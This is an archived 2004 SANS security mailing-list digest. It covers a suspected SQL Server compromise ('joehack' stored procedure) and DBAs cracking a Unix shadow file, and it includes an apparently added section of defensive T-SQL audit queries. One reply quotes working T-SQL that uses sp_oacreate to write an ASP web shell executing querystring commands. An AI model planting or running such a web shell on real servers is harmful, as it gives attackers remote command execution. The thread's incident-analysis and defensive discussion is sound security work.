[Intrusions] Re: joehack, SQL and the 1433 Scans.... (Chris Norton)
Scott Sanders
Scott.Sanders at Toyota-fs.com
Fri Nov 12 14:34:56 GMT 2004
Chris,
The SQL server is accessible from a web-based application; the SQL cluster
is a back-end database for a web-based application. The web app is
accessible from an external network where the PCs have an internet
connection. We also have several VPNs to vendor networks that have access
to the SQL cluster; I assume that if there's internet access on the vendor
network, then the SQL server is accessible from here also; however, all
traffic comes through our PIX firewalls.
The web-based app is hosted on Windows 2000/IIS 5.0 servers, but the query
runs on a local SQL account that has a Public role on the database.
Thanks in advance...
Regards,
Scott Sanders
IT Operations
Europe & Africa Region
Toyota Financial Services (UK)
D +44 (0)1737 365512
F +44 (0)1737 365520
M +44 (0)7810 884614
E scott.sanders at toyota-fs.com
From: intrusions-request at lists.sans.org (sent by intrusions-bounces at lists.sans.org)
Date: 12/11/2004 12:08
To: intrusions at lists.sans.org
Subject: Intrusions Digest, Vol 8, Issue 11
Today's Topics:
1. Re: joehack, SQL and the 1433 Scans.... (Chris Norton)
2. Re: Requested opinions on Access. (Margles)
3. RE: Requested opinions on Access. (M. Shirk)
----------------------------------------------------------------------
Message: 1
Date: Thu, 11 Nov 2004 12:04:26 -0600
From: "Chris Norton" <kicktd_list at hotmail.com>
Subject: Re: [Intrusions] joehack, SQL and the 1433 Scans....
To: "Intrusions List \(GCIA Practicals\)" <intrusions at lists.sans.org>
Message-ID: <BAY22-DAV6101s7hpJm00018a75 at hotmail.com>
Content-Type: text/plain; charset="iso-8859-1"
Scott,
Is the database accessible from a website for example? The reason I ask is
this sounds like a SQL injection attempt or maybe someone got your MSSQL
user/pass somehow.
[Taken from Advanced SQL Injection In SQL Server Applications -
http://www.ngssoftware.com]
This example creates an ASP script that will run any command passed to it
in the querystring:
-- scripting.filesystemobject example - create a 'run this' .asp file
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'
It is important to note that when running on a Windows NT4, IIS4 platform,
commands issued by this ASP script will run as the 'system' account. In
IIS5, however, they will run as the low-privileged IWAM_xxx
--
Chris Norton
UAT Student Software Engineering Network Defense
----- Original Message -----
From: "Scott Sanders" <Scott.Sanders at Toyota-fs.com>
To: <intrusions at lists.sans.org>
Sent: Wednesday, November 10, 2004 1:55 AM
Subject: [Intrusions] joehack, SQL and the 1433 Scans....
> Hi there...
>
> I'm hoping somebody can help shed light on this issue as we have an
> identical situation here and I'm not having much luck gathering info on
> this.
>
> We have been investigating processor spikes on a SQL server and we have
> also found a stored procedure running with this 'joehack' string. The
> details are below:
>
> DECLARE @OUTPAR1 int
> execute sp_<removed string> @OUTPAR1 output
> select @OUTPAR1 'joehack'
>
> This seems to be running under a valid SQL account.
>
> Any advice is appreciated.
>
> Regards,
> Scott Sanders
> IT Operations
> Europe & Africa Region
> Toyota Financial Services (UK)
> D +44 (0)1737 365512
> F +44 (0)1737 365520
> M +44 (0)7810 884614
> E scott.sanders at toyota-fs.com
>
>
> This correspondence is for the intended recipient only. It may contain
> confidential or legally privileged information or both. No
> confidentiality or privilege is waived or lost by any mistransmission
> or unauthorised alteration during transmission.
>
> If you are not the intended recipient, any disclosure, copying,
> distribution or any action taken or omitted to be taken in reliance on
> it, is prohibited and may be unlawful. If you receive this
> correspondence in error, please immediately delete it from your system
> and notify the sender.
>
> Any views expressed in this message are those of the individual sender,
> except where the sender expressly, and with authority, states them to
> be the views of Toyota.
>
> This message has been checked for viruses but the recipient is strongly
> advised to rescan the message before opening any attachments or
> attached executable files.
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions
>
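As an added defender's check, not part of the thread or of the NGS paper Chris quotes: two T-SQL audit queries covering the situation Scott describes (a stored procedure carrying the 'joehack' marker, run under a valid SQL account) and the sp_OACreate technique Chris cites. They use the SQL Server 2000-era system tables sysobjects, syscomments, sysusers and sysprotects, which later versions retain as compatibility views; the 'joehack' marker comes from the thread, the other search terms and procedure names are my choice.

```sql
-- Added audit queries (not from the thread or the NGS paper).
-- 1. Which stored procedures in the current (application) database
--    reference OLE Automation or shell procedures, or carry the
--    'joehack' marker seen in the thread? syscomments.text holds the
--    procedure source in 4000-character chunks (hence DISTINCT) and is
--    unreadable for procedures created WITH ENCRYPTION. [_] escapes the
--    LIKE single-character wildcard so 'sp[_]OA' matches a literal '_'.
SELECT DISTINCT
       o.name   AS proc_name,
       u.name   AS owner,
       o.crdate AS created
FROM   sysobjects  o
JOIN   syscomments c ON c.id  = o.id
JOIN   sysusers    u ON u.uid = o.uid
WHERE  o.xtype = 'P'
  AND (c.text LIKE '%sp[_]OACreate%'
    OR c.text LIKE '%sp[_]OAMethod%'
    OR c.text LIKE '%xp[_]cmdshell%'
    OR c.text LIKE '%joehack%')
ORDER  BY o.crdate DESC;

-- 2. Who holds EXECUTE on the OLE Automation / shell procedures in
--    master? A web application's SQL login should not appear here,
--    directly or through a role such as public.
--    sysprotects.action 224 = EXECUTE; protecttype 205 = GRANT,
--    204 = GRANT WITH GRANT OPTION, 206 = DENY.
USE master;
SELECT o.name AS procedure_name,
       u.name AS grantee,
       CASE p.protecttype
            WHEN 204 THEN 'GRANT WITH GRANT OPTION'
            WHEN 205 THEN 'GRANT'
            WHEN 206 THEN 'DENY'
       END    AS permission
FROM   sysprotects p
JOIN   sysobjects  o ON o.id  = p.id
JOIN   sysusers    u ON u.uid = p.uid
WHERE  p.action = 224
  AND  o.name IN ('sp_OACreate', 'sp_OAMethod', 'sp_OAGetProperty',
                  'sp_OASetProperty', 'sp_OADestroy', 'xp_cmdshell')
ORDER  BY o.name, u.name;
```

Any row in the second result naming the web application's login, or a DENY that is missing where one is expected, is the thing to follow up on; the first query's created dates help tie a suspicious procedure to the processor spikes Scott mentions.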
------------------------------
Message: 2
Date: Thu, 11 Nov 2004 12:07:40 -0600
From: Margles <margles at gmail.com>
Subject: Re: [Intrusions] Requested opinions on Access.
To: "Intrusions List (GCIA Practicals)" <intrusions at lists.sans.org>
Message-ID: <f8d9ff62041111100741867cea at mail.gmail.com>
Content-Type: text/plain; charset=US-ASCII
installing and running a program such as crack
_without-explicit-authorization_ is usually grounds for being
fired... even if you are Security, which a DBA usually is not.
in my experience, understanding of security, paying attention to
timely patching, proper securing of accounts (including admin
accounts), good passwords, and other issues were all things that the
DBAs did not handle appropriately but complained about. luckily they
did not have admin rights over their workstations...
it came down to upper management support for proper separation of
duties, and respect for the folks responsible for security in the
different areas.
mas
On Wed, 10 Nov 2004 07:41:37 -0800, Wilson, Mark <wilsonm at emwd.org> wrote:
> Ladies and Gentlemen;
>
> I have an issue with our Data Base Admins (DBAs) wanting the root
> passwords for their workstations. We had just recently a DBA run a crack
> against a shadow file and move the shadow file from one of the Unix
> machines to a PC.
>
> We staff separate Systems Administrators that normally admin these
> workstations, and I have a "symbiotic" relation on security issues with
> our SAs and trust them to perform necessary updates.
>
> Obvious issues aside, I would really like to hear about policies and
> issues that others have in relation to DBAs having root access.
> These DBAs support our Oracle Financials (ehhh, shiver up my spine)
> that hold all our customer financial information.
>
> I would really appreciate responses to this since it has become a very
> touchy issue and I'm getting stuck in the middle being the Security
> person.
>
> Thanks.
>
> Mark Wilson
> Communications Analyst / IT Security
> Eastern Municipal Water District
> 2270 Trumble Rd.
> Perris Ca. 92572
> 951.928.3777.4544
> www.emwd.org
>
------------------------------
Message: 3
Date: Thu, 11 Nov 2004 11:52:17 -0500
From: "M. Shirk" <shirkdog_linux at hotmail.com>
Subject: RE: [Intrusions] Requested opinions on Access.
To: intrusions at lists.sans.org
Message-ID: <BAY19-F34znOxbkK0rG0000928c at hotmail.com>
Content-Type: text/plain; format=flowed
This is grounds for dismissal or even prosecution (in the government I
would say).
NIST Guidelines speak to Identification and Authentication. Basically, a
"Need to Know basis". Security controls should be in place so separation
of duties is possible. They are DBAs and should never have the ROOT
password to any Unix server. If they need admin privileges for certain
binaries or scripts, grant them "Only what they Need", and nothing more.
However, if you have no security policy, they are free to do as they
please. This is even the case if today you go and install security
controls like integrity checkers, host-based IDS, or any other
techniques. There has to be a policy to hold individuals accountable for
their actions.
Shirkdog.
------------------------------
End of Intrusions Digest, Vol 8, Issue 11
*****************************************